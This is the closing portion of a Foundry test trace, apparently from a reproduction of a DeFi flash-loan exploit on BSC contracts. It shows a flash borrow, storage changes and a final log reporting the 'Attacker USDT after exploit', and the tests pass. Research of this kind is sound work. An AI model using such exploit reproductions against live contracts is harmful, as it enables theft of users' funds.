    │   │   │   @ 0xca59b6aaf5d96c23cbea6fdb0b402f05f8cf994503ebfcc4615d53f0d9c354e9: 0 → 0x000000000000000000000000000000000000000000000051270c608dd7c40000
    │   │   │   @ 0x40efe119f1031eb281b5b195ed42e00327d441da2528f3ffaa1e7fa89579fa7f: 0 → 0x00000000000000000000000000000000000000000000005150ae84a8cdf00000
    │   │   └─ ← [Stop]
    │   ├─ [531] 0x55d398326f99059fF775485246999027B3197955::balanceOf(0x36696169C63e42cd08ce11f5deeBbCeBae652050) [staticcall]
    │   │   └─ ← [Return] 43430185919243476963546422 [4.343e25]
    │   ├─ [534] 0xbb4CdB9CBd36B01bD1cBaEBF2De08d9173bc095c::balanceOf(0x36696169C63e42cd08ce11f5deeBbCeBae652050) [staticcall]
    │   │   └─ ← [Return] 13108618541737229100893 [1.31e22]
    │   ├─ emit Flash(param0: ContractTest: [0x7FA9385bE102ac3EAc297483Dd6233D62b3e1496], param1: ContractTest: [0x7FA9385bE102ac3EAc297483Dd6233D62b3e1496], param2: 1500000000000000000000 [1.5e21], param3: 0, param4: 750000000000000000 [7.5e17], param5: 0)
    │   ├─  storage changes:
    │   │   @ 4: 0x0000000000000000a3cc5b88143e67fb000000000000018780865dc9d92befc9 → 0x0000000000000000a3cc5b88143e67fb000000000000018784104eeffae56fc9
    │   │   @ 2: 0x00000000000000000000000000000000976665b439e5972f75d3f80fc05ce316 → 0x00000000000000000000000000000000976668388ce0469e5136efad918ab90c
    │   └─ ← [Stop]
    ├─ [531] 0x55d398326f99059fF775485246999027B3197955::balanceOf(ContractTest: [0x7FA9385bE102ac3EAc297483Dd6233D62b3e1496]) [staticcall]
    │   └─ ← [Return] 32720669999999999999999 [3.272e22]
    ├─ emit log_named_decimal_uint(key: "[End] Attacker USDT after exploit", val: 32720669999999999999999 [3.272e22], decimals: 18)
    ├─  storage changes:
    │   @ 41: 0 → 0x00000000000000000000000000000000000000000000005150ae84a8cdf00000
    │   @ 1: 0x000000000000000000000000000000000000000000000000000000000d480d48 → 0x000000000000000000000000000000000000000000000000000000010d480d48
    └─ ← [Stop]

Suite result: ok. 1 passed; 0 failed; 0 skipped; finished in 29.27s (26.93s CPU time)

Ran 2 test suites in 30.60s (30.06s CPU time): 2 tests passed, 0 failed, 0 skipped (2 total tests)
